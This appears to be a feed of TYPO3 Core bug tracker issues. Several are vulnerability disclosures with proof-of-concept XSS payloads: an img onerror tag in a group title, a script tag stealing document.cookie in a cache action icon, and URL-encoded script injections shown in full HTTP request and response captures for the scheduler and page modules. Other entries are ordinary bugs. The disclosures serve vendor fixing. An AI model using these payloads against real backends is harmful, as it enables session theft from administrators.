TYPO3 Forge: Issueshttp://forge.typo3.org/http://forge.typo3.org/themes/typo3_forge/favicon/favicon.png?17058661692021-01-21T09:33:22ZTYPO3 Forge
Redmine TYPO3 Core - Bug #93335 (Closed): XSS in access permission modulehttp://forge.typo3.org/issues/933352021-01-21T09:33:22ZOliver Haderoliver.hader@typo3.org
<a name="Steps"></a>
<h2 >Steps<a href="#Steps" class="wiki-anchor">¶</a></h2>
<ul>
<li>having <code>be_groups.title</code> containing XSS</li>
</ul>
<pre>Group<img src="x" onerror="alert(1)"></pre>
<ul>
<li>open <code>System > Access</code> module for a particular page</li>
<li>click on groupname element</li>
<li>change to group containing XSS in title (prerequisite) & save</li>
<li>click on groupname element again</li>
<li>change to different group</li>
<li>click on "x" icon in order to revert change</li>
</ul>
<p>XSS is executed</p>
<a name="Reasons"></a>
<h2 >Reasons<a href="#Reasons" class="wiki-anchor">¶</a></h2>
<ul>
<li><a class="external" href="https://github.com/TYPO3/TYPO3.CMS/blob/master/Build/Sources/TypeScript/beuser/Resources/Public/TypeScript/Permissions.ts#L84">https://github.com/TYPO3/TYPO3.CMS/blob/master/Build/Sources/TypeScript/beuser/Resources/Public/TypeScript/Permissions.ts#L84</a></li>
</ul>
<pre>buttonSelector.innerHTML = groupnameHtml;</pre> TYPO3 Core - Bug #91334 (Closed): XSS in jQuery <3.5.0http://forge.typo3.org/issues/913342020-05-07T14:20:43ZOliver Haderoliver.hader@typo3.org
<p><a class="external" href="https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/">https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/</a></p> TYPO3 Core - Bug #84591 (Closed): XSS in ToolbarItems icon renderinghttp://forge.typo3.org/issues/845912018-04-04T08:24:34ZOliver Haderoliver.hader@typo3.org
<blockquote>
<p>Today i build for a customer a CacheManipulateClass to flush a few news caches. (Please do not judge these flush cache way. I know about clearCacheCmd)</p>
<p>Context: Regular be login and a sitepackage extension which register this class.</p>
<p>Proof of Concept: My class add this identifier</p>
</blockquote>
<pre>
/**
* @param array $cacheActions
* @param array $optionValues
*
* @return void
*/
public function manipulateCacheActions(&$cacheActions, &$optionValues)
{
$iconFactory = GeneralUtility::makeInstance(IconFactory::class);
$cacheActions[] = [
'id' => 'news_clear_cache',
'title' => 'Flush news caches',
'description' => 'Clear fluid cache for frontend pages with news',
'href' => (new UriBuilder())->buildUriFromRoute('news_clear_cache'),
'icon' => '<script>alert(document.cookie);</script>'
];
}
</pre>
<blockquote>
<p>In TYPO3 7.6.x the Cache manipulator hast he option „icon“ which will be handled at TYPO3/v7/typo3/sysext/backend/Classes/Backend/ToolbarItems/ClearCacheToolbarItem.php<br />In the function getDropdown (line 160) the function called $cacheAction[‚icon‘] without htmlspecialchars().</p>
</blockquote> TYPO3 Core - Bug #82079 (Closed): XSS in schedulerhttp://forge.typo3.org/issues/820792017-08-10T15:39:53ZOliver Haderoliver.hader@typo3.org
<p>I would like to inform you about security issue that I have found on the plugin SCHEDULER of the cms TYPO3 (checked on version 8.7.3), specifically it is accessible in the "Scheduler" section of the Backend administrative console.</p>
<p>The plugin Scheduler of TYPO3 is resulted vulnerable to Reflected Cross-Site Scripting, for the requests to Add or Edit a task, specifically on the 2 parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D".</p>
<p>Technical Details
=================<br />Below is descripted the scenario to reproduce the security issue.</p>
<p>Proof of Concept:<br />To replicate the issue an authenticated user (with permission to create/edit tasks) have to click the button "Add-Task" or "Edit-Task" in the Scheduler area.<br />And so is sufficient to grab the request which is being passed to the server and add the payloads in the 2 vulnerable parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D", so the submitted payloads are replicated on the response.</p>
<p>EXAMPLE<br />Payloads: <br />krup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1<br />de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag</p>
<p>ORIGINAL REQUEST:<br />----------------------------------<br />POST /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 479<br />Referer: <a class="external" href="http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add">http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add</a><br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1</p>
<p>tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save</p>
<p>PoC REQUEST:<br />-----------------------<br />GET /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add&tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=15008874533rup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Referer: <a class="external" href="http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add">http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add</a><br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1</p>
<p>PoC RESPONSE:<br />--------------------------<br />HTTP/1.1 200 OK<br />Date: Mon, 24 Jul 2017 09:35:42 GMT<br />Server: Apache/2.4.18 (Ubuntu)<br />Expires: 0<br />Last-Modified: Mon, 24 Jul 2017 09:35:42 GMT<br />Cache-Control: no-cache, must-revalidate<br />Pragma: no-cache<br />X-Frame-Options: SAMEORIGIN<br />Vary: Accept-Encoding<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 51666</p>
<p><!DOCTYPE html><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br />[...]<br /><label>Task group</label></abbr></span><div class="form-control-wrap"><select name="tx_scheduler[task_group]" id="task_class" class="form-control"><option value="0" title=""></option></select></div></div></div><br /><div class="form-section"><div class="row"><div class="form-group col-sm-6" id="task_start_col"><label><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_start"><abbr class="t3-help-teaser">Start (HH:MM DD-MM-YYYY)</abbr></span></label><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_start_row-wrapper"><input name="tx_scheduler[start]_hr" value="20:48 11-08-2445" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_start_row"><input name="tx_scheduler[start]" value="15008874533rup3z"><script>alert(1)</script>yflbjwmu6m1" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_start_row"><span class="fa fa-calendar"></span></label></span></div></div></div><br /><div class="form-group col-sm-6" id="task_end_col"><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_end"><abbr class="t3-help-teaser"><label>End (HH:MM DD-MM-YYYY)</label></abbr></span><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_end_row-wrapper"><input name="tx_scheduler[end]_hr" value="" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_end_row"><input name="tx_scheduler[end]" value="de6gi"><script>alert(2)</script>h3wq9ysmjag" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_end_row"><span class="fa fa-calendar"></span></label></span></div></div></div></div></div><br />[...]</p>
<p>Attached a screenshot of the PoC to better illustrate the vulnerability.</p>
<p>Vulnerable Versions:<br />TYPO3 8.7.3 and earlier</p>
<p>Checked on TYPO3/8.7.3</p>
<p>I have not received your response for the other 2 previous reporting (I hope to receive at least a response from you). Anyway I am always available if you need further explanations, kind regards.</p> TYPO3 Core - Bug #82077 (Closed): XSS in page modulehttp://forge.typo3.org/issues/820772017-08-10T15:35:29ZOliver Haderoliver.hader@typo3.org
<p>For the attention of the TYPO3 security team,</p>
<p>I would like to inform you about a security issue that I have found on the cms TYPO3 (checked on versions 8.7.3 and 6.2.30).</p>
<p>Specifically that versions of TYPO3 are vulnerable to a Reflected Cross-Site Scripting in the "Edit Page" area of the Backend administrative console, for the pages which are configured to show the content from other pages.</p>
<p>Technical Details
=================<br />Below is descripted the scenario to reproduce the security issue.</p>
<p>Prerequisite - Configure a page to show content from another page: in the home Backend administrative console select "Page" from the left panel, then select a site page in the tree view on the side and go to the "Edit Page". After select the "Appaerance" tab and click the "Page" button in the "Replace Content" section in order to add any content to that page and finally save it.</p>
<p>At this point in the "Edit Page" area for the aforementioned page will appear a blue rectangle with inside a link with the label "Page uses content from ...", and this link is affected by the reflected XSS issue.</p>
<p>Proof of Concept:<br />To replicate the issue is sufficient to click the aforementioned new link (for the 8.7.3 it have the format: "/typo3/index.php?M=web_layout&moduleToken=<TOKEN-VALUE>&id=<ID-VALUE>").</p>
<p>And so grab the GET request which is being passed to the server and add the payload in the URL query, so the submitted payload is reflected on the correspondent response body.</p>
<p>EXAMPLE (attached there is a screenshot of the PoC)<br />Payload: &xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E</p>
<p>ORIGINAL REQUEST:<br />--------------------------------<br />GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2 HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />If-Modified-Since: Wed, 12 Jul 2017 07:20:31 GMT</p>
<p>PoC REQUEST:<br />------------<br />GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1</p>
<p>PoC RESPONSE:<br />-------------<br />HTTP/1.1 200 OK<br />Date: Wed, 12 Jul 2017 08:15:06 GMT<br />Server: Apache/2.4.18 (Ubuntu)<br />Expires: 0<br />Last-Modified: Wed, 12 Jul 2017 08:15:06 GMT<br />Cache-Control: no-cache, must-revalidate<br />Pragma: no-cache<br />X-Frame-Options: SAMEORIGIN<br />Vary: Accept-Encoding<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 41399</p>
<p><!DOCTYPE html><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br />[...]<br /><div class="callout callout-info"><div class="media"><div class="media-left"><span class="fa-stack fa-lg callout-icon"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-info fa-stack-1x"></i></span></div><div class="media-body"><h4 class="callout-title">page1</h4><div class="callout-body"><br /> Page uses content from this page: <a href="/typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=1&xss"><script>alert('xss')</script>=">page1 (PID 1)</a><br /></div></div></div></div><br />[...]</p>
<p>Vulnerable Versions:<br />TYPO3 8.7.3 and earlier</p>
<p>Checked on:<br />TYPO3/8.7.3 <br />TYPO3/6.2.30 (for the 6.2.x versions the affected link is "/typo3/sysext/cms/layout/db_layout.php?id=1&clear_cache=1")</p> TYPO3 Core - Bug #78743 (Rejected): Wrong translation behavior for pages/pages_language_overlayhttp://forge.typo3.org/issues/787432016-11-18T13:30:30ZOliver Haderoliver.hader@typo3.org
<ol>
<li>on localizing a page, references of <code>pages.media</code> are not copied to <code>pages_language_overlay.media</code> in DataHandler if <code>localizeChildrenAtParentLocalization</code> is defined in TCA</li>
<li>RootlineUtility is not capable of resolving overlays correctly, ignores <code>l10n_mode</code> and uses custom reference queries -> RelationHandler could be used here</li>
</ol> TYPO3 Core - Bug #72475 (Closed): XSS in belog modulehttp://forge.typo3.org/issues/724752015-12-30T13:23:09ZOliver Haderoliver.hader@typo3.org
<p>The belog module, accessible for admin users, is vulnerable for XSS.</p>
<p>Requirements</p>
<p>a) create a backend user having the name <pre>te<b>st</b></pre><br />b) create a workspace record having the title <pre>work<b>space</b></pre></p>
<p>PoC</p>
<ul>
<li>switch to the created user</li>
<li>switch to the create workspace</li>
<li>modify or create any content</li>
<li>open the log at System>Log and see the unescaped contents of the user and workspace</li>
</ul> TYPO3 Core - Task #59874 (Closed): Wrong sys_refindex for deleted child recordshttp://forge.typo3.org/issues/598742014-06-25T13:17:48ZOliver Haderoliver.hader@typo3.orgTYPO3 Core - Task #59853 (Closed): Wrong nesting of deleted versioned child recordshttp://forge.typo3.org/issues/598532014-06-24T17:25:16ZOliver Haderoliver.hader@typo3.org
Scenario/Actions:
<ul>
<li>having an IRRE parent-child structure (live)</li>
<li>backend, workspace selected</li>
<li>delete a child-record and save</li>
<li>the workspace module shows wrong nesting for deleted records</li>
</ul>
<p>Reason:<br />The reference index points for the deleted element uses the live id, instead of the versioned id.</p>
<p>DataSet:<br />typo3/sysext/workspaces/Tests/Functional/DataHandling/IRRE/ForeignField/Modify/DataSet/modifyParentNDeleteHotelChild.csv (sys_refindex not checked there)</p> TYPO3 Core - Bug #39958 (Closed): Wrong name attribute in custom user rendered itemshttp://forge.typo3.org/issues/399582012-08-19T13:43:03ZOliver Haderoliver.hader@typo3.org
<p>Configuration items/properties that use a user function to render the accordant values and possibilities (like, e.g. saltedpasswords does in the Core) have a wrong name attribute.</p>
The information to be delivered shall be:
<ul>
<li>fieldName: Extbase prefixed form name</li>
<li>fieldValue: the value of the field to be shown</li>
<li>propertyName: Name of the property, e.g. "some.setting"</li>
</ul> TYPO3 Core - Bug #39952 (Closed): Wrong nested extension configuration handlinghttp://forge.typo3.org/issues/399522012-08-19T12:12:40ZOliver Haderoliver.hader@typo3.org
<p>Nested default configurations and specific system configuration of an extension are not merged correctly. This affects reading configuration properties and persisting them.</p> TYPO3 Core - Bug #36841 (Closed): Wrong query in RecordCollectionRepositoryhttp://forge.typo3.org/issues/368412012-05-04T13:11:56ZOliver Haderoliver.hader@typo3.org
<p>If t3lib_collection_RecordCollectionRepository::queryMultipleRecords() is called without any argument the SQL statement is wrong since t3lib_BEfunc::deleteClause() starts with "AND".</p> TYPO3 Core - Bug #36242 (Closed): Wrong or missing XCLASS definitionshttp://forge.typo3.org/issues/362422012-04-17T19:46:30ZOliver Haderoliver.hader@typo3.org
<p>Several classes in t3lib/file/ have wrong or missing XCLASS definitions.</p> TYPO3 Core - Bug #21727 (Closed): Wrong encoding of labels in t3editorhttp://forge.typo3.org/issues/217272009-11-28T17:42:35ZOliver Haderoliver.hader@typo3.org
<p>The encoding of labels in t3editor is wrong and will deliver empty labels if special chars appear there and a non-UTF-8 encoding is used.</p>
<p>(issue imported from #M12825)</p> TYPO3 Core - Bug #25507 (Closed): Wrong syntax highlighting in wrong contexthttp://forge.typo3.org/issues/255072007-11-26T15:46:42ZOliver Haderoliver.hader@typo3.org
<p>Examples of code snippets tested:<br />10.value = My.TEXT.file.txt<br />5.file = EXT:whatever/res/header.jpg</p>
<p>In these examples the "TEXT" and "header" words get highlighted but shouldn't because they are used in string context and not as TypoScript keywords/properties.</p>
<p>(issue imported from #M6834)</p>